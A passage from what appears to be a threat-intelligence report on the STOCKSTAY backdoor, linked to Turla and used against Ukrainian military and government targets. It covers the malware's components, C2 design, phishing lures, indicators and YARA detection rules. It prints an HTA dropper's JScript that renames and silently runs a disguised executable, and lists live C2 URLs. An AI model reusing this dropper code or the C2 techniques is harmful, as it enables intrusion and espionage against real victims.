STOCKSTAY.STOCKMARKET, internally referred to as “cor”, is the orchestrator of the STOCKSTAY ecosystem, and enables the implant’s configurability. The malware’s configuration is loaded from an encrypted on-disk configuration file which specifies several options regarding the malware’s execution, including the details of the remote WebSocket server required by STOCKSTAY.STOCKBROKER. The configuration file attempts to disguise itself as a legitimate file by including various legitimate URLs associated with cryptocurrency markets, as well as falsified descriptions of each configuration field (Figure 2). Encrypted configuration data is embedded within the decoy fields, which is decrypted by STOCKSTAY.STOCKMARKET.
{
"Name": "StockMarket",
"Description": "An application for getting information about current events on trading platforms. To set the time for updating information, enter a value in minutes in the `Interval` field. In the future, support for themes will be added. The `SystemConfiguration` field stores the system settings of the application. In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`.",
"Theme": "Dark",
"SystemConfiguration": [
"1D.AA.79.9F.45.AA.04.B3.<snipped>.68.0A.5D.A3.E6.A3.82.FA",
"6F.41.4D.6D.C3.20.E5.32.<snipped>.00.B8.26.DF.E1.13.0A.21",
"4.4.3.12"
],
"Interval": 10,
"Services": [
"wss://ws-api.binance.com:443/ws-api/v3",
"wss://ws-feed.exchange.coinbase.com",
"wss://ws-feed-public.sandbox.exchange.coinbase.com",
"wss://stream.bybit.com/v5/public/spot",
"wss://stream.bybit.com/v5/public/linear"
],
"Version": "2022-12-21"
}
Figure 2: Encrypted STOCKSTAY configuration file format, falsely describing itself as an application for trading information
Figure 3: Decrypted STOCKSTAY configuration file format (extracted from SystemConfiguration field)
STOCKSTAY.STOCKMARKET communicates with STOCKSTAY.STOCKBROKER in order to provide details of the WebSocket server, and to subsequently send and receive messages via the established WebSocket connection, usually containing the results of executed commands. STOCKSTAY.STOCKMARKET also communicates with the STOCKSTAY.STOCKTRADER component in order to issue commands to be executed on the infected host.
On first execution, STOCKSTAY.STOCKMARKET generates a unique 4096-bit RSA key pair, to be used throughout the implant’s lifecycle to encrypt outbound data prior to being sent via WebSocket. The implant’s public key is sent to the server in the malware’s first request, to enable the server to decrypt task responses. STOCKSTAY.STOCKMARKET also generates a unique infection identifier to be used by the C2 server to determine the intended receiver of tasking. STOCKSTAY’s configuration file specifies an “internal_id” field, which GTIG assesses represents an identifier for the server-side component of the malware ecosystem. We assess that this identifier is used by the malware’s operators to retrieve responses from interim C2 servers which may be used by multiple operators. To date, GTIG has observed only a single unique value for this identifier and is unable to determine whether multiple operators are leveraging STOCKSTAY at this time due to insufficient telemetry.
STOCKSTAY.STOCKTRADER
STOCKSTAY.STOCKTRADER, internally referred to as “sys”, is the backdoor component of the STOCKSTAY ecosystem, and supports a range of registry, file, and command execution operations on the infected host, as detailed in Table 1.
Task Command Name
Description
Del
Delete the specified files.
Requires a semi-colon-separated list of file paths, each of which will be deleted. Confirmation of each deleted file, or deletion failure, is returned to the C2.
Dir
Generate a listing of the specified directories.
Requires a semi-colon-separated list of directory paths, each of which will be enumerated with the paths of all contained files and subdirectories being returned to the C2.
Optionally performs recursive directory listing.
Get
Retrieve one or more specified files. Allows for collection of files with specific extensions.
Requires a semi-colon-separated list of file or directory paths, and a list of target file extensions. If a file path is included in the list, this file will be returned. If instead a directory path is included in the list, the malware will perform an optionally recursive search of the directory to identify any files matching the target file extensions.
All files matching either the specified file paths, or the target file extensions, will be added to an in-memory ZIP archive and subsequently base64-encoded for transmission to the C2.
Image
Perform a screen-capture of the victim’s screen.
The resultant image is base64-encoded for transmission to the C2.
MkDir
Create one or more directories.
Requires a semi-colon-separated list of directory paths, each of which will be created. Confirmation of each created directory, or any resultant error, is returned to the C2.
MultyTask
Process multiple tasks at once.
Requires a semi-colon-separated list of tasks, each of which must be a serialized JSON object containing an individual task.
Each task is submitted to the malware’s command-manager in-turn, with all command output being discarded; no data is returned to the C2 when processing multiple tasks at once.
Put
Upload a file to the device.
Requires a base64-encoded string representation of the file content to be written to the specified filepath. The required file write operation is performed in “Append” mode.
Confirmation of file upload, or details of any relevant error, is returned to the C2.
RegDelete
Delete a registry value.
Requires a registry key and corresponding value name to delete.
RegRead
Read a registry value.
Requires a registry key and corresponding value name to read.
RegWrite
Set a registry value.
Requires a registry key and corresponding value name, as well as the value and data type used to populate the registry value.
RmDir
Delete the specified directories.
Requires a semi-colon-separated list of directory paths, each of which will be deleted. Confirmation of each deleted directory, or deletion failure, is returned to the C2.
Run
Execute a new process.
Requires a path to the file to execute and its corresponding arguments. A default timeout of 60 seconds is hard-coded into the malware, however this can be overridden by the task configuration.
All subprocesses are created windowless with redirected stdout.
Sysinfo
Conduct a system survey to gather key information about the infected host.
Operating system information is collected via the Windows Management Instrumentation (WMI) ManagementObjectSearcher, specifically the following fields:
OSVersion
Architecture
SerialNumber
CodeSet
CountryCode
Locale
InstallDate
BootupTime
MachineName
SystemDirectory
LocalTime
AnsiCodePage
UserName
With respect to hardware, WMI is queried for the following:
ProcessorName
NumberCores
ClockSpeed
MemoryCapacity
MemoryType
DiskModel
DiskSize
The malware also captures a list of the names of running processes.
UnpackArchive
Extract the specified ZIP file to its current directory.
Table 1: Backdoor commands supported by STOCKSTAY.STOCKTRADER
Related Downloaders and Installers
STOCKSTAY.MARKETMAKER
STOCKSTAY.MARKETMAKER is a proxy-aware downloader written in .NET using the Windows Forms framework that downloads and extracts additional payloads from a remote server, establishes persistence through Windows registry modifications, and runs silently in the background with no user interface. This downloader has been observed masquerading as "MicrosoftUpdateOneDrive" to appear legitimate while setting up multiple autorun entries to execute the core components of STOCKSTAY.
.NET AppDomainManager
During our analysis, GTIG identified what we believe to be an early development sample of STOCKSTAY.MARKETMAKER which, instead of downloading the required components, was dependent on external mechanisms (such as .NET AppDomainManager injection) for the initial deployment of samples to the target host.
STOCKSTAY Server-Side Controller
GTIG identified a publicly accessible GitHub repository containing a Python implementation of the victim-facing STOCKSTAY WebSocket server controller. The lightweight design of the server component appears to supplement the threat actor’s usage of third-party hosting platforms such as Render platform which provides a platform for hosting web services, including WebSockets. The inability for the server to decrypt inbound messages prevents introspection by platform operators, and further obfuscates the location of the threat actor’s dedicated infrastructure. This architecture somewhat resembles Turla’s multi-hop KAZUAR C2 infrastructure.
Figure 4: Overview of STOCKSTAY C2 Infrastructure
The server extends tornado.websocket.WebSocketHandler to provide the interface described in Table 2, under the path /ws; aligning with all observed STOCKSTAY WebSocket C2 URLs.
Handles inbound messages from the connected client.
Inbound messages are base64-decoded before being parsed as JSON into an object internally known as a “package”.
Each “package” contains an “action” and a “container”, which provide the request’s type and associated data, respectively. The following describes the handling logic of each action type.
Action: send
The server extracts the following attributes from the inbound message’s “container” and inserts them into a new row within the local weather_data database table.
container.target
The STOCKSTAY client populates this field with the internal_id or i_id field from the config file.
container.sender
The STOCKSTAY client populates this field with the unique client uuid generated on first execution.
container.message
This field contains the encrypted message body in a format referred to within the STOCKSTAY client as “CryptoContainer”.
On completion, the server logs the following message:
Action: send; trgt={target_id}; sndr={sender_id}
Action: recv
Inbound recv requests simply specify the container.sender attribute, which corresponds with the client’s unique identifier.
The server then retrieves all messages from the weather_data database table where the target identifier (“degrees” column) matches the specified container.sender. This has the effect of allowing the client to retrieve all messages intended for it, such as those sent to the server by an upstream C2 controller.
Each matching row is returned to the client in the following format, before being deleted from the database.
Logs the client’s IP address using the following string format:
WebSocket close. IP: {client_ip}
Table 2: Overview of STOCKSTAY WebSocket Server Interface
Database Structure
The server maintains a local SQLite3 database under the filename weather_data1.db, structured as shown in Tables 3 and 4.
Column
Description
id
Primary key
degrees
Recipient's UUID from container.target
pressure
Sender's UUID from container.sender
wdata
Message data from container.message
coords
Sender's IP address, extracted from X-Forwarded-For header, or none_ip if no sender specified.
status
Defaults to 0 - doesn't appear to be used or returned to the client.
datetime
Time of row creation
Table 3: weather_data database table structure
Column
Description
id
Primary key
data
Log message
datetime
Time of creation
Table 4: log database table structure
Key Operational Characteristics
Consistent Use of Academic or Diplomatic Lure Content
The threat actor(s) involved in STOCKSTAY operations appear to have an affinity for integrating academia and diplomacy into their infrastructure and lure/decoy content, including:
compromising an email account belonging to a Ukrainian university to disseminate phishing emails;
using the names of an academic institution within the file name of a malicious RDP file;
compromising a diplomatic education platform for phishing and distribution of malicious RDP files;
using “education” and “diplo” within registered phishing domains; and
using “DiplomacyEduAI” as the product name within STOCKSTAY MSI files.
Persistent Ukrainian Targeting
A significant proportion of STOCKSTAY operations observed by GTIG have been targeted at Government or Military organizations within Ukraine, consistent with Russian interests in relation to the ongoing conflict between the two countries. The threat actor has been observed utilizing in-country compromised infrastructure, including compromised government services, to deploy both STOCKSTAY and a range of supplementary payloads, in support of these operations.
Suspected European Targeting
A smaller number of STOCKSTAY operations observed by GTIG appear to have been targeted at European entities. Early development samples of STOCKSTAY were identified in various European nations, including Italy, the Netherlands, Poland, and Germany; however, we have been largely unable to confirm the intended victims for the majority of these early infections, nor whether these samples were identified as a result of the threat actor testing their capabilities against publicly available virus scanning services such as VirusTotal. GTIG was able to identify, in at least one case, the targeting of entities associated with, or interested in, a foreign affairs ministry in Europe in relation to phishing and suspected STOCKSTAY activity.
Deployment via Malicious RDP Files
GTIG observed STOCKSTAY being deployed following successful phishing attempts using malicious RDP configuration files. The RDP files were designed to create a connection from the victim’s device to actor-controlled infrastructure, through which the actor could then deploy subsequent payloads.
In one operation in early 2025, GTIG identified a phishing email, claiming to be sent by a defense-related training academy, containing a malicious RDP file attachment. A short time following the victim’s connection to the actor’s infrastructure, the actor deployed STOCKSTAY.MARKETMAKER, a .NET downloader designed to retrieve and install the full STOCKSTAY suite on the victim’s device.
Later, in mid-2025, GTIG identified similar malicious RDP files being hosted on a compromised diplomatic-themed education platform, luring victims into downloading and executing the file under the guise of enabling access to an online training portal. GTIG was unable to confirm whether STOCKSTAY was ultimately deployed as a result of this operation; however, overlaps in the actor’s infrastructure and education-themed lures for both operations may suggest STOCKSTAY was the intended payload.
Deployments at Multiple Stages of Operations
Through GTIG’s visibility, we have identified that the threat actor uses STOCKSTAY at multiple distinct stages of their operations.
In the first instance, the threat actor uses STOCKSTAY during operations to gain initial access into environments which haven’t yet been subject to the group’s reconnaissance activities. In these instances, STOCKSTAY is configured with hard-coded configuration passwords, which can be trivially extracted by analysts. We observed this type of infection stemming from the group’s phishing operations, where the threat actor is unable to determine exactly where in the victim’s network they are going to gain their initial foothold.
When the threat actor deploys STOCKSTAY at a later stage of operation, following reconnaissance, STOCKSTAY is configured to incorporate environmental keying for its configuration, requiring the malware to be executed either on a specific host, by a specific user, within a specific domain, or a pre-determined combination of the these attributes. This configuration implies that, at this stage, the actor knows exactly which machine is being targeted, likely through existing accesses to the target environment. This was seen within Ukrainian networks where STOCKSTAY was deployed toward the end of an operation which had previously relied heavily on the group’s other tools, such as KAZUAR.
Overlaps with KAZUAR
K1MORPHER String Obfuscation
In April 2025, GTIG observed STOCKSTAY being updated to implement a new string obfuscation mechanism, based around an obscure pseudo-random number generation algorithm named “Squirrel3”, which was presented at Game Developers Conference 2017.
GTIG later identified versions of STOCKSTAY containing some of their original class-names, which showed the code responsible for runtime string deobfuscation being contained within a class named “K1.Morpher”. Analysis of K1MORPHER shows the ability to perform runtime deobfuscation of a range of datatypes, such as strings, integers, and arrays.
In June 2025 GTIG noticed K1MORPHER code appearing in samples of KAZUAR. KAZUAR has historically used its own simple but effective code and string obfuscation techniques to evade detection, such as: the insertion of junk code; replacing static constant values with the results of XOR operations; and large quantities of unique character substitution tables. The actor’s use of K1MORPHER within STOCKSTAY appears to be trending toward mimicking KAZUAR’s multi-class obfuscation techniques, where obfuscation is handled by multiple distinct classes, as observed in suspected test builds of STOCKSTAY hosted on a compromised Cypriot website in April 2024.
Implant Architecture
Since at least 2024, KAZUAR has been observed being deployed using a multi-component architecture, whereby C2 communication, task orchestration, and task execution are managed by separate components. Within the KAZUAR ecosystem, these components are referred to as “BRIDGE”, “KERNEL”, and “WORKER”, respectively.
As of late 2023, GTIG identified a similar separation of responsibilities within the STOCKSTAY ecosystem, with the same responsibilities being separated into distinct components. C2 communication is managed by the component tracked by GTIG as STOCKSTAY.STOCKBROKER, while task orchestration and execution are handled by STOCKSTAY.STOCKMARKET and STOCKSTAY.STOCKTRADER, respectively.
Environmental Keying
Both KAZUAR and STOCKSTAY ecosystems have been observed using environmental keying to protect themselves from detection and analysis.
DIAMONDBACK, a dropper often deployed prior to KAZUAR in the execution chain, has made use of a hash of the target’s hostname in decrypting its payload, to prevent divulgence of its intentions outside of the target environment. Later versions of DIAMONDBACK can be configured to incorporate the target’s username and domain name in the hash required to decrypt the payload.
STOCKSTAY has been observed using the hash of the target’s hostname or domain name during the decryption of its configuration data, preventing disclosure of C2 infrastructure unless operating in the intended environment.
Summary of Overlaps
GTIG assesses with moderate confidence that STOCKSTAY and KAZUAR may be developed in-part by a common developer or team, with active development occurring in tandem between the two malware ecosystems. We believe that STOCKSTAY is being developed in KAZUAR’s image, with several design decisions likely spawning from the threat actor’s wealth of experience in conducting operations using this long-standing toolkit. Both ecosystems rely heavily on .NET development, and have been observed using compromised WordPress sites during various stages of their operations.
We assess with low confidence that our observations of STOCKSTAY being deployed alongside KAZUAR during active operations may be a result of the threat actor seeking to test new capabilities in active operations, particularly where they may be expecting their existing access to be remediated in the near future.
STOCKSTAY Timeline
GTIG has conducted a thorough investigation into the history of STOCKSTAY, identifying suspected development activity as far back as December 2022. What follows is our assessment of the timeline of events surrounding STOCKSTAY’s development and deployment. To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) within each observed operation section, and in a GTI Collection for registered users.
Figure 5: Timeline of STOCKSTAY observations
December 2022
The version of the open-source websocket-sharp.dll bundled with the majority of observed STOCKSTAY.STOCKBROKER samples was last modified, according to timestamp information in MSI files and ZIP archives containing STOCKSTAY. Although built from an open-source library, this specific instance appears to have been compiled by the actor themselves, thus creating a uniquely identifiable artifact with which to track this malware’s continuous development.
Filename
Description
SHA-256
websocket-sharp.dll
Instance of open-source library used by the threat actor
An early version of STOCKSTAY was uploaded to VirusTotal from Germany, under the filename “DriversPrinterGraphic.rar”. From the archive’s timestamps, it appears as though the sample was submitted within 20 minutes of being created, likely indicating this was submitted by the malware’s developer.
This version predates the malware’s separation into distinct role-based components, instead incorporating all core functionality into a single executable: StockMarketNews.exe. Additionally, this version of STOCKSTAY contained the user interface shown in Figure 6, which enables viewing/editing of configuration options and command messages, while still presenting as a stock market utility.
Figure 6: Early STOCKSTAY user-interface
This particular STOCKSTAY sample uses a slightly different configuration file format; however, the underlying configuration options are consistent with later versions. This sample also utilizes environmental keying for its configuration file; using the lower-cased hostname of the intended target as the decryption password. GTIG has been unable to recover the password at this time.
A further RAR archive containing STOCKSTAY was submitted to VirusTotal at 2023-12-06 08:52:49 from the Netherlands, under the filename “apps_libwallets_v1.3.rar”. This archive was last modified the previous day at 2023-12-05 16:47:42. This pattern may indicate that the archive was created by the individual at the end of their working day, and then submitted the following day when they returned to the office.
This instance of STOCKSTAY was the first case observed by GTIG of the malware’s core functionality being separated into distinct role-based components, using the filenames shown in Table 7.
Component
Filename
STOCKSTAY.STOCKMARKET
StockMarketView.exe
STOCKSTAY.STOCKBROKER
StockMarketNet.exe
STOCKSTAY.STOCKTRADER
StockMarketSystem.exe
Table 7: STOCKSTAY component filenames observed in December 2023
Similar to the sample observed in September 2023, this instance of STOCKSTAY also used environmental keying, however this instance used the target computer’s domain name as the configuration password. GTIG has been unable to recover the password at this time.
GTIG conducted a review of an incident response conducted by Mandiant relating to a late-2023 compromise of a Ukrainian organization, in which we observed Turla deploying a wide range of tools into the victim’s network, including WILDDAY, DIAMONDBACK and KAZUAR, via malicious GPO installation from a compromised domain controller. This activity was accompanied by other simple scripts and backdoors to deploy malware across multiple machines in the infected organization.
During the review, GTIG identified evidence of STOCKSTAY execution on one of the hosts impacted by the infected domain controller. Multiple ZIP archives, each containing one of the core components of STOCKSTAY or its configuration, were uploaded to the domain controller. The files were found in a directory used for staging registry files used to install WILDDAY both prior to and after STOCKSTAY appeared on the host, as well as for staging output from an otherwise unknown Powershell backdoor (iclsClient.ps1) which was also observed running from the domain controller.
During this operation, an initial STOCKSTAY configuration file was deployed to the domain controller alongside the STOCKSTAY core component executables, however this file was not able to be decrypted using any known passwords or environmental identifiers. A short while later, Mandiant observed a second configuration file being deployed to the domain controller, this time encrypted using the domain name associated with the compromised network. GTIG assesses with moderate confidence that the deployment of the initial configuration file was either a mistake by the threat actor - perhaps deploying a configuration file associated with a different victim - or the result of a default or invalid configuration file being bundled with STOCKSTAY during initial deployment to prevent sensitive C2 details from being captured in the event of early detection of the malware in the victim’s environment.
The successfully decrypted configuration defined a STOCKSTAY WebSocket C2 URL of wss://wool-basalt-clock.glitch.me/ws. Additionally, the configuration specified an operational time-frame of Monday to Friday between the hours of 0900 and 1800 on the victim's system. This time-based restriction is likely intended to blend C2 communications with normal business operations in the victim's network. This same time-frame has been observed in a majority of STOCKSTAY configuration files analyzed by GTIG.
Of particular note, toward the end of this operation, Mandiant identified firewall detections relating to one of KAZUAR’s C2 endpoints. GTIG assesses, with low to moderate confidence, that the threat actor could have been aware of the suspicion surrounding its C2 and deployed STOCKSTAY as a failsafe in case KAZUAR was identified and remediated, thus enabling reinfection at a later date, in the event that STOCKSTAY remained undetected.
Indicator
Description
wss://wool-basalt-clock.glitch.me/ws
STOCKSTAY WebSocket C2
Table 9: Network indicators
February 2024: Italy
An MSI file configured to install STOCKSTAY was uploaded to VirusTotal at 2024-02-20 11:45:26 from Italy, under the filename “Copia.msi”. The MSI masqueraded as the ILSpy application developed by ICSharpCodeTeam, and contained a large number of legitimate benign components. The MSI installed the core STOCKSTAY components under %LOCALAPPDATA%/Programs/SMN/, and enabled persistent execution via registry run keys.
The STOCKSTAY samples contained in the MSI were compiled between January 29 and January 31, 2024, with the configuration file last being modified on February 13, 2024, just a week before being submitted to VirusTotal.
In addition to the installation of STOCKSTAY, the MSI file contains a custom MSI action named “OpenUrl”. This action has the sequence number 1 in the InstallUISequence table, indicating it should be executed before any other actions. The custom action is configured to execute the following command:
When viewed, the URL contains references to elections (“elezioni”) and the Italian organization “Circolo Degli Esteri”, which according to their official website (https://www.circoloesteri.it/), was founded to “represent the Ministry of Foreign Affairs”. We do not currently assess that the actor was directly targeting Italian elections, and was instead using elections-related phishing lures to target victims. Due to limited visibility, we have been unable to identify any earlier stages of this particular operation, and cannot confirm the identity of the intended targets of any potential related phishing campaigns.
Foreign Affairs Club 1936
Approval of the 2023 Financial Statement
Analysis of the status of those registered to vote (automatically updates every 60 seconds)...
update 6:26:50
Total Voters: 915
Currently registered members with 2-tonte status: 364
Currently registered with status 4 Ready to vote: 5
Currently registered with status 3 - Voted 46
Voter turnout (votes cast on registered voters): 5.03%
Figure 7: Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri
Although inconclusive, this appears to indicate an intention to deploy STOCKSTAY against Italian-speaking individuals or organizations, specifically with a focus on foreign affairs.
In following with previous STOCKSTAY instances, this sample utilized environmental keying for its configuration file. GTIG was able to recover the domain name used to decrypt the configuration file in order to identify the WebSocket C2 address wss://wool-basalt-clock.glitch.me/ws. This matches the C2 address used in January 2024.
Italian language lure relating to voting on matters related to the Italian Ministry of Foreign Affairs.
wss://wool-basalt-clock.glitch.me/ws
STOCKSTAY WebSocket C2
Table 11: Network indicators
March 18 – April 3, 2025: Ukraine
On April 2, 2025, GTIG identified a compromised email account sending a phishing email containing a message purporting to originate from a Ukrainian university, relating to the testing of a new distance learning environment. The threat actor attached a malicious Remote Desktop Protocol (RDP) file to the email, which upon opening resulted in a connection being established between the victim and an open RDP port (3389) hosted on the actor-registered domain chosen to imitate the same academic institution.
Once the victim connected to the actor's infrastructure, GTIG observed the actor deploying STOCKSTAY.MARKETMAKER to the client. STOCKSTAY.MARKETMAKER was configured to download a ZIP containing STOCKSTAY from a legitimate but compromised website belonging to the State Regulatory Service of Ukraine. In contrast to the majority of earlier observations, the configuration file observed during this operation was protected with a hard-coded password. This appears to correspond with this particular operation’s focus on initial access to a victim’s environment via spear-phishing, through which the specific domain or host name may not be known to the threat actor, and thus cannot be used for environmental keying. GTIG was able to identify the malware using the WebSocket C2 URL wss://weatherdataai.theworkpc.com/ws.
According to the metadata associated with the ZIP archive downloaded by STOCKSTAY.MARKETMAKER, the core STOCKSTAY components used during this operation were last modified between March 18 – 26, with the configuration file last being modified on March 31.
Compromised State Regulatory Service of Ukraine infrastructure serving ZIP archive containing STOCKSTAY components
wss://weatherdataai.theworkpc.com/ws
STOCKSTAY WebSocket C2
Table 13: Network indicators
May 14, 2025: Poland
GTIG identified two samples of STOCKSTAY.STOCKBROKER being uploaded to VirusTotal on May 14, 2025 from Poland.
The first sample, named “ClientMNGR2.exe”, matched previously observed versions, however the second sample, named “GR3.exe”, was heavily obfuscated using large quantities of junk code, and a previously unknown string obfuscation mechanism. GTIG tracks this obfuscation mechanism as K1MORPHER, and we have since observed its inclusion in all core STOCKSTAY components, and within select samples of KAZUAR; increasing our confidence that STOCKSTAY exists within the same development ecosystem as other malware leveraged by Turla.
Filename
Description
SHA-256
ClientMNGR2.exe
STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER
May 28 – August 8, 2025: Ukraine — Deployment via Malicious HTA
On August 8, 2025, GTIG identified a RAR archive, “calculator.rar”, being submitted to VirusTotal. The archive had been hosted on compromised infrastructure belonging to a Ukrainian IT company since at least July 22, 2025. The archive contained a malicious HTA file named “Калькулятор грошового забезпечення військовослужбовців 2025.hta” (translation: "Military personnel cash benefit calculator 2025.hta"). The HTA was designed to execute a variant of the STOCKSTAY.MARKETMAKER downloader, which was also included in the archive, using the code shown in Figure 9.
Figure 8: Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta
<script language="JScript">
function renameAndRunFile() {
try {
var oldName = "calculator_2025_files\\styles.dat";
var newName = "calculator_2025_files\\styles.dat.exe";
var fso = new ActiveXObject("Scripting.FileSystemObject");
if (fso.FileExists(oldName)) {
if (fso.FileExists(newName)) {
fso.DeleteFile(newName);
}
fso.MoveFile(oldName, newName);
var shell = new ActiveXObject("WScript.Shell");
shell.Run('"' + newName + '"', 1, false);
} else {
}
} catch (e) {
}
}
window.onload = function() {
renameAndRunFile();
};
</script>
Figure 9: JavaScript code contained in Калькулятор грошового забезпечення військовослужбовців 2025.hta
The STOCKSTAY.MARKETMAKER variant retrieved a ZIP archive, “EditorToolsPdf.zip”, containing the core STOCKSTAY components from a second compromised server located in Ukraine, this time hosting the archive within a compromised WordPress instance.
Analysis of the modification timestamps within the military calculator lure archive show that this operation dated as far back as May 28, 2025, when the majority of the contents of the “calculator_2025_files” folder were last modified. The STOCKSTAY.MARKETMAKER executable was last modified on June 5, 2025, and the malicious HTA file was modified on June 10, 2025.
Similar examination of the STOCKSTAY archive shows the configuration file being modified on June 4, 2025, while the archive itself was last modified on the compromised server on June 5, 2025. This series of events shows that the complete STOCKSTAY ZIP archive was staged on the compromised infrastructure while modifications were being made to the initial phishing lures.
GTIG has been able to confirm via a trusted third party that the original compromise of the Ukrainian server used to host the STOCKSTAY archive occurred on or before May 13, 2025.
Compromised WordPress infrastructure hosting STOCKSTAY ZIP archive
wss://canal1zac1a.onrender.com/ws
STOCKSTAY WebSocket C2
Table 16: Network indicators
July 23 – 28, 2025: Actor Uses GitHub to Host STOCKSTAY MSI Files
GTIG identified a GitHub account we suspect of being used by the threat actor to test or deploy STOCKSTAY. The GitHub account, Roberto1983-ai, was created on July 23, 2025 at 12:01:03.
On July 24, 2025, the account created a public repository named msi_installer_test2, into which a single file was uploaded: DiplomacyEduAI.msi. A second repository, this time named msi_installer_test3, was created by the same user on July 28, 2025, and subsequently populated with another version of DiplomacyEduAI.msi.
Both versions of DiplomacyEduAI.msi contained core STOCKSTAY components, alongside a configuration file containing the WebSocket C2 URL wss://canal1zac1a.onrender.com/ws. GTIG has been unable to identify any active operations using these specific MSI files.
August 14, 2025: Actor Uses GitHub to Host STOCKSTAY Server Code
GTIG identified a second GitHub account, which was observed hosting what we assess to be server-side code for handling STOCKSTAY C2 communications. The GitHub account, ChikenFresh, was created on August 14, 2025, then almost immediately created a public repository named google-ai-labs-it, into which the suspected C2 controller code was uploaded. Our analysis of the C2 controller is included in the malware analysis section earlier in this report.
The GitHub repository name corresponds with a STOCKSTAY C2 server identified running on the Render platform, however GTIG has not observed any active operations using this infrastructure. We assess that the threat actor linked this GitHub repository to their Render account in order to utilize their WebSocket hosting capabilities.
November 2025: Ukraine — Drone-Related Lures and Deployment via CVE-2025-8088
On November 6, 2025, GTIG identified a batch of phishing emails being sent from a drone-themed UKR.NET email account, to approximately 20 Ukraine-based targets, each containing a unique ukr.net file sharing link. Each link led to a malicious RAR archive which exploits a path traversal vulnerability in WinRAR (CVE-2025-8088) to install the core STOCKSTAY components. Continuations of this phishing activity were observed on November 12 and 14, 2025. We identified that only around 30% of the recipients of these phishing emails opened the emails, however we are unable to confirm how many of these individuals downloaded or executed the malicious payloads. All affected Google accounts were marked for additional authentication checks as a precautionary measure against potential account compromise. Google also notified affected users via our Government Backed Attack Warning (GBAW) notifications.
GTIG identified two distinct types of Ukrainian-language decoy documents within the malicious RAR archives, both appearing to target Ukrainian military personnel. The first, “Донесення БпЛА 06.11.2025.docx” (“UAV report 06.11.2025.docx”), claimed to be “[A] Report on the availability/need for UAVs, their condition, the availability of crews for each UAV in the units, their training in the defense zone of the 1st Brigade as of 06.11.2025” (see Figure 10).
Figure 10: “Report” Decoy document from November 2025
The second decoy, observed as “Товари(докладніше).docx” (“Products (more details).docx”) and “Приклади товарів для листа (деталізовано).docx” (“Examples of products for the letter (detailed).docx”), predominantly comprised of an equipment list referencing: “Tactical medicine”; “Communication and surveillance equipment”; “Equipment and survival equipment”; and “Automotive property” (see Figure 11).
Figure 11: “Equipment List” Decoy document from November 2025
Each of the decoy documents contained an external image reference that causes a connection to be made from the victim’s machine to a site likely monitored by the threat actor, signaling that the document has been opened. GTIG believes the URLs referenced by the decoy documents may be hosted on compromised infrastructure.
GTIG identified that the instances of STOCKSTAY observed being deployed during this operation contained enhancements intended to increase resistance to detection, specifically by carving out functionality into external modules. These external modules were named to imitate legitimate Windows libraries, using the filenames shown in Table 20.
Component
Filename
STOCKSTAY.STOCKMARKET
MSViewer.exe
Shared STOCKSTAY core module
ms-lib-math-core.dll
STOCKSTAY.STOCKBROKER
MSDriver.exe
STOCKSTAY.STOCKBROKER core module
ms-api-wmcpdt.dll
STOCKSTAY.STOCKTRADER
MSRender.exe
STOCKSTAY.STOCKTRADER core module
ms-api-win-render.dll
Table 21: STOCKSTAY component filenames observed in November 2025
GTIG observed two distinct STOCKSTAY WebSocket C2 URLs being used during this phishing wave. The majority of instances used the URL wss://driverx86-adobe.onrender.com/ws; however, we were able to identify at least one instance of STOCKSTAY using wss://google-ai-labs-it.onrender.com/ws, corresponding to the previously described GitHub repository associated with the ChikenFresh user.
Alongside the core STOCKSTAY components, the malicious RAR archives contained LNK files, described as “Updater Shortcut”, corresponding to each core STOCKSTAY component. The extraction file path was configured to attempt to deploy into the startup programs directory.
GTIG was able to identify that the actor began creating the LNK files for this operation approximately six hours prior to the first phishing emails being sent, with the Ukrainian-language lure documents being created around four hours prior.
GTIG attributes the STOCKSTAY ecosystem and related activity to threat clusters assessed with high confidence links to Turla, based on the following:
STOCKSTAY uses Windows-1251 during command-processing - an encoding notably designed specifically to support Cyrillic script. This is indicative of a development or operational environment linked to Eastern Europe, the Balkans, or Central Asia.
STOCKSTAY has code overlaps with KAZUAR, a widely-attributed proprietary Turla toolkit, based on the recent introduction of K1MORPHER string obfuscation into both malware families within a similar time window.
GTIG observed STOCKSTAY being delivered from compromised infrastructure which was also identified as hosting part of Turla’s victim-facing KAZUAR C2 infrastructure.
Turla has a consistent focus on targeting Ukrainian Defense and Military organizations, and was identified within a Mandiant Incident Response deploying STOCKSTAY alongside a range of other proprietary Turla malware, such as WILDDAY, DIAMONDBACK, and KAZUAR.
Detections
Google Security Operations (SecOps)
SecOps customers will have access to the following pending-deployment rules. Once fully deployed, these rules will be available under the Mandiant Frontline Threats, Mandiant Hunting and Mandiant Intel Emerging Threats rule packs:
Archiver Extraction To Windows Startup
Registry Write Registry Run Keys
Registry Write to Run Registry Key
Potential RDP File Write From Phishing
RDP Connection Initiated from Staging Directory
Onrender Subdomain Suspicious DNS Query
YARA Rules
rule G_Backdoor_STOCKSTAY_ConfigurationFile_2 {
meta:
author = "Google Threat Intelligence Group"
description = "Detects encrypted configuration files associated with STOCKSTAY."
hash = "40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3"
strings:
$s1 = "\"SystemConfiguration\""
$s2 = "An application for getting information about current events on trading platforms"
$s3 = "To set the time for updating information, enter a value in minutes in the `Interval` field"
$s4 = "The `SystemConfiguration` field stores the system settings of the application."
$s5 = "In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`."
$s6 = "wss://"
condition:
uint16(0) == 0x227B // {"
and 4 of ($s*)
}
rule G_Backdoor_STOCKSTAY_ConfigurationFile_5 {
meta:
author = "Google Threat Intelligence Group"
description = "Detects plaintext configuration files used by the STOCKSTAY malware family."
hash = "6cee9e838792ac5e2098362d68ce93a9a2c095d476dc16b289fe8509c99b2b8b"
strings:
$internal_id_1 = "\"internal_id\""
$internal_id_2 = "\"i_id\""
$internal_key_1 = "\"internal_key\""
$internal_key_2 = "\"i_k\""
$interval_engine_1 = "\"interval_engine\""
$interval_engine_2 = "\"ie\""
$level_info_1 = "\"level_info\""
$level_info_2 = "\"li\""
$time_scale_1 = "\"time_scale\""
$time_scale_2 = "\"ts\""
$span_min_1 = "\"span_min\""
$span_min_2 = "\"mx1\""
$span_max_1 = "\"span_max\""
$span_max_2 = "\"my1\""
$rate_1 = "\"rate\""
$rate_2 = "\"rt_x_y\""
